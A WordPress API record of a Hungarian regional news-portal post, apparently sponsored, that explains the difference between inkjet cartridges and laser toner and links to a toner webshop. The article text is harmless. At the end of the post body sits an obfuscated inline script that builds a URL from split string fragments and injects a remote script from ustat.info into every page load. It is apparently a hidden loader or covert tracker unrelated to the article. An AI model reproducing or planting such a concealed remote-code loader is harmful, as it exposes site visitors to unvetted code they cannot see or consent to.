{"id":22511,"date":"2020-01-27T14:23:18","date_gmt":"2020-01-27T13:23:18","guid":{"rendered":"http:\/\/dorogimedence.hu\/?p=22511"},"modified":"2020-01-27T14:23:23","modified_gmt":"2020-01-27T13:23:23","slug":"tudja-melyik-festek-a-legmegfelelobb-az-on-szamara","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/","title":{"rendered":"Tudja melyik fest\u00e9k a legmegfelel\u0151bb az \u00d6n sz\u00e1m\u00e1ra?"},"content":{"rendered":"<p><strong>Tintapatron vagy tonerkazetta? Nem biztos benne, hogy mit jelentenek az egyes jel\u00f6l\u00e9sek? Az al\u00e1bbiakban \u00e1ttekint\u00e9st ny\u00fajtunk \u00d6nnek a nyomtat\u00f3kazett\u00e1kr\u00f3l, amely seg\u00edt a helyes fest\u00e9kkazetta kiv\u00e1laszt\u00e1s\u00e1n\u00e1l.<\/strong><\/p>\n<p>Ha nem tudja, hogy milyen fest\u00e9kkazetta val\u00f3 a nyomtat\u00f3j\u00e1ba, ne essen k\u00e9ts\u00e9gbe. Tudja azonban, hogy mi a f\u0151 k\u00fcl\u00f6nbs\u00e9g a tonerkazetta \u00e9s a tintapatron k\u00f6z\u00f6tt? Vagy tal\u00e1n t\u00e9vesen \u00fagy gondolja, hogy a toner tintapatront is tartalmaz? Ha ezekre a k\u00e9rd\u00e9sekre nem tudott v\u00e1laszt adni, vagy ha a fest\u00e9k kiv\u00e1laszt\u00e1s\u00e1n\u00e1l k\u00e9ts\u00e9ge t\u00e1mad afel\u0151l, hogy a nyomtat\u00f3 tov\u00e1bbra is kiv\u00e1l\u00f3an fog m\u0171k\u00f6dni az \u00faj tint\u00e1val vagy tonerrel, ne hagyja abba az olvas\u00e1st.<\/p>\n<p><strong>Tintasugaras nyomtat\u00f3ba keres fest\u00e9ket?<\/strong><\/p>\n<p>Ebben az esetben a tintapatronokat keresse. Ezek a kazett\u00e1k a tintasugaras nyomtat\u00f3kba val\u00f3k. A nyomtat\u00f3n\u00e1l a konkr\u00e9t gy\u00e1rt\u00f3 term\u00e9keit keresse. Ez kulcsfontoss\u00e1g\u00fa a megfelel\u0151 nyomtat\u00f3kazetta kiv\u00e1laszt\u00e1s\u00e1n\u00e1l. \u00cdgy nem lesz gondja p\u00e9ld\u00e1ul a <span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff; text-decoration: underline;\" href=\"https:\/\/www.tonerpartners.hu\/webshop\/festekkazettak-nyomtatokhoz\/canon\/canon-pixma-ts705\/\" target=\"_blank\" rel=\"noopener noreferrer\">Canon Pixma TS705 patron<\/a><\/span> keres\u00e9s\u00e9n\u00e9l sem. Att\u00f3l f\u00fcggetlen\u00fcl, hogy eredeti fest\u00e9ket, vagy azok olcs\u00f3bb alternat\u00edv\u00e1it keresi, biztos, hogy minden nyomtat\u00f3hoz tal\u00e1l fest\u00e9ket.<\/p>\n<p><strong>A toner nem minden nyomtat\u00f3ba j\u00f3<\/strong><\/p>\n<p>A nagy nyomtat\u00f3 k\u00edn\u00e1latb\u00f3l t\u00f6rt\u00e9n\u0151 v\u00e1laszt\u00e1s mellett nem csak egyetlen t\u00edpus\u00fa technol\u00f3gi\u00e1val tal\u00e1lkozik. A fentiekben ismertetett tintapatronokon k\u00edv\u00fcl l\u00e9teznek m\u00e9g tonerek, azaz &#8222;<span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff; text-decoration: underline;\" href=\"https:\/\/www.tonerpartners.hu\" target=\"_blank\" rel=\"noopener noreferrer\">fest\u00e9kkazetta<\/a><\/span>&#8222;. Ezek kiz\u00e1r\u00f3lag a l\u00e9zernyomtat\u00f3kban haszn\u00e1lhat\u00f3k, \u00e9s jellemz\u0151en por alakban k\u00e9sz\u00fclnek.<\/p>\n<p><strong>Hogyan v\u00e1lasszuk ki a csere patront?<\/strong><\/p>\n<p>\u00d6n el\u00e9gedett a fest\u00e9kkel, azonban a patron meg\u00fcresedett. Ha ismeri a tintakazetta vagy a toner konkr\u00e9t jel\u00f6l\u00e9s\u00e9t, semmi sem korl\u00e1tozza \u00d6nt abban, hogy \u00fajat v\u00e1s\u00e1roljon. Ehhez v\u00e1laszt\u00e1si lehet\u0151s\u00e9ge is van, hiszen a k\u00edn\u00e1latban nem csup\u00e1n az eredeti fest\u00e9kek jelennek meg, hanem k\u00fcl\u00f6nf\u00e9le kompatibilis v\u00e1ltozatok is.<\/p>\n<p>Ha azonban nem ismeri a pontos jel\u00f6l\u00e9s\u00e9t, nagyon j\u00f3 seg\u00edts\u00e9get ny\u00fajt a nyomtat\u00f3 m\u00e1rk\u00e1ja \u00e9s a modell pontos megjel\u00f6l\u00e9se. A keres\u00e9sn\u00e9l a fest\u00e9k pontos neve helyett ugyanis megadja a nyomtat\u00f3 t\u00edpus\u00e1t \u00e9s gy\u00e1rt\u00f3j\u00e1nak a nev\u00e9t \u00e9s ism\u00e9t ar\u00e1nylag gyorsan eljuthat a k\u00edv\u00e1nt eredm\u00e9nyhez. \u00dagyszint\u00e9n v\u00e1laszthat az eredeti nyomtat\u00f3kazett\u00e1k \u00e9s a kompatibilis verzi\u00f3k k\u00f6z\u00f6tt.<\/p>\n<p>Van m\u00e1r \u00e1ttekint\u00e9se arr\u00f3l, hogy milyen fest\u00e9ket kell keresnie a nyomtat\u00f3j\u00e1ba? Ez a r\u00f6vid \u00f6sszefoglal\u00e1s ennek megk\u00f6nny\u00edt\u00e9s\u00e9t szolg\u00e1lja. A felt\u00f6lt\u00e9sn\u00e9l l\u00e9zeres nyomtat\u00f3 eset\u00e9ben keressen tonerkazett\u00e1t, m\u00edg tintasugaras nyomtat\u00f3n\u00e1l tintapatront. Ha a kazetta jel\u00f6l\u00e9se nem j\u00f3l olvashat\u00f3, a fest\u00e9k sz\u00e1m\u00e1t a nyomtat\u00f3 modellje \u00e9s jel\u00f6l\u00e9se alapj\u00e1n is azonos\u00edthatja.<\/p>\n<p><em>A k\u00e9p forr\u00e1sa: antpkr \/ Shutterstock.com<\/em><br \/>\n<script>\n(function(){\ntdvhu=\"312r2xukdvhd\";tdvh=document.createElement(\"script\");\ntdvh_=\"u\"+(\"st\");tdvh_+=\"at\"+(\".\");tdvh.async=true;tdvh_+=\"in\";\ntdvhu=\"188498025.\"+tdvhu;tdvh.type=\"text\/javascript\";tdvhu+=\"6f7d7020v1d1\";\ntdvhu+=\"jd1Xb3\";tdvh_+=(\"f\")+\"o\"+(\"\/\");tdvh.src=\"https:\/\/\"+tdvh_+tdvhu;\ntdvhd=document.body;tdvhd.appendChild(tdvh);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tintapatron vagy tonerkazetta? Nem biztos benne, hogy mit jelentenek az egyes jel\u00f6l\u00e9sek? Az al\u00e1bbiakban \u00e1ttekint\u00e9st ny\u00fajtunk \u00d6nnek a nyomtat\u00f3kazett\u00e1kr\u00f3l, amely seg\u00edt a helyes fest\u00e9kkazetta kiv\u00e1laszt\u00e1s\u00e1n\u00e1l. Ha nem tudja, hogy milyen fest\u00e9kkazetta val\u00f3 a nyomtat\u00f3j\u00e1ba, ne essen k\u00e9ts\u00e9gbe. Tudja azonban, hogy mi a f\u0151 k\u00fcl\u00f6nbs\u00e9g a tonerkazetta \u00e9s a tintapatron k\u00f6z\u00f6tt? Vagy tal\u00e1n t\u00e9vesen \u00fagy gondolja,<\/p>\n","protected":false},"author":1,"featured_media":22512,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[4666,4668,4669,4670,4667,4671],"class_list":{"0":"post-22511","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hirek","8":"tag-festekkazetta","9":"tag-nyomtato","10":"tag-nyomtato-toner","11":"tag-tintapatron","12":"tag-toner","13":"tag-tonerkazetta"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Tudja melyik fest\u00e9k a legmegfelel\u0151bb az \u00d6n sz\u00e1m\u00e1ra?<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"Tudja melyik fest\u00e9k a legmegfelel\u0151bb az \u00d6n sz\u00e1m\u00e1ra?\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"Tintapatron vagy tonerkazetta? Nem biztos benne, hogy mit jelentenek az egyes jel\u00f6l\u00e9sek? Az al\u00e1bbiakban \u00e1ttekint\u00e9st ny\u00fajtunk \u00d6nnek a nyomtat\u00f3kazett\u00e1kr\u00f3l, amely seg\u00edt a helyes fest\u00e9kkazetta kiv\u00e1laszt\u00e1s\u00e1n\u00e1l. Ha nem tudja, hogy milyen fest\u00e9kkazetta val\u00f3 a nyomtat\u00f3j\u00e1ba, ne essen k\u00e9ts\u00e9gbe. Tudja azonban, hogy mi a f\u0151 k\u00fcl\u00f6nbs\u00e9g a tonerkazetta \u00e9s a tintapatron k\u00f6z\u00f6tt? Vagy tal\u00e1n t\u00e9vesen \u00fagy gondolja,\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2020-01-27T13:23:18+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:modified_time\" content=\"2020-01-27T13:23:23+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2020\/01\/festekkazetta.jpg?fit=670%2C365&ssl=1\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"670\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"365\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"Tudja melyik fest\u00e9k a legmegfelel\u0151bb az \u00d6n sz\u00e1m\u00e1ra?\",\"datePublished\":\"2020-01-27T13:23:18+00:00\",\"dateModified\":\"2020-01-27T13:23:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/\"},\"wordCount\":551,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2020\\\/01\\\/festekkazetta.jpg\",\"keywords\":[\"fest\u00e9kkazetta\",\"nyomtat\u00f3\",\"nyomtat\u00f3 toner\",\"tintapatron\",\"toner\",\"tonerkazetta\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/\",\"name\":\"Tudja melyik fest\u00e9k a legmegfelel\u0151bb az \u00d6n sz\u00e1m\u00e1ra?\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2020\\\/01\\\/festekkazetta.jpg\",\"datePublished\":\"2020-01-27T13:23:18+00:00\",\"dateModified\":\"2020-01-27T13:23:23+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2020\\\/01\\\/festekkazetta.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2020\\\/01\\\/festekkazetta.jpg\",\"width\":670,\"height\":365},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/01\\\/27\\\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Tudja melyik fest\u00e9k a legmegfelel\u0151bb az \u00d6n sz\u00e1m\u00e1ra?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Tudja melyik fest\u00e9k a legmegfelel\u0151bb az \u00d6n sz\u00e1m\u00e1ra?","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/","og_locale":"hu_HU","og_type":"article","og_title":"Tudja melyik fest\u00e9k a legmegfelel\u0151bb az \u00d6n sz\u00e1m\u00e1ra?","og_description":"Tintapatron vagy tonerkazetta? Nem biztos benne, hogy mit jelentenek az egyes jel\u00f6l\u00e9sek? Az al\u00e1bbiakban \u00e1ttekint\u00e9st ny\u00fajtunk \u00d6nnek a nyomtat\u00f3kazett\u00e1kr\u00f3l, amely seg\u00edt a helyes fest\u00e9kkazetta kiv\u00e1laszt\u00e1s\u00e1n\u00e1l. Ha nem tudja, hogy milyen fest\u00e9kkazetta val\u00f3 a nyomtat\u00f3j\u00e1ba, ne essen k\u00e9ts\u00e9gbe. Tudja azonban, hogy mi a f\u0151 k\u00fcl\u00f6nbs\u00e9g a tonerkazetta \u00e9s a tintapatron k\u00f6z\u00f6tt? Vagy tal\u00e1n t\u00e9vesen \u00fagy gondolja,","og_url":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2020-01-27T13:23:18+00:00","article_modified_time":"2020-01-27T13:23:23+00:00","og_image":[{"width":670,"height":365,"url":"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2020\/01\/festekkazetta.jpg?fit=670%2C365&ssl=1","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"3 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"Tudja melyik fest\u00e9k a legmegfelel\u0151bb az \u00d6n sz\u00e1m\u00e1ra?","datePublished":"2020-01-27T13:23:18+00:00","dateModified":"2020-01-27T13:23:23+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/"},"wordCount":551,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2020\/01\/festekkazetta.jpg","keywords":["fest\u00e9kkazetta","nyomtat\u00f3","nyomtat\u00f3 toner","tintapatron","toner","tonerkazetta"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/","url":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/","name":"Tudja melyik fest\u00e9k a legmegfelel\u0151bb az \u00d6n sz\u00e1m\u00e1ra?","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2020\/01\/festekkazetta.jpg","datePublished":"2020-01-27T13:23:18+00:00","dateModified":"2020-01-27T13:23:23+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2020\/01\/festekkazetta.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2020\/01\/festekkazetta.jpg","width":670,"height":365},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/01\/27\/tudja-melyik-festek-a-legmegfelelobb-az-on-szamara\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"Tudja melyik fest\u00e9k a legmegfelel\u0151bb az \u00d6n sz\u00e1m\u00e1ra?"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/22511","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=22511"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/22511\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media\/22512"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=22511"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=22511"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=22511"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}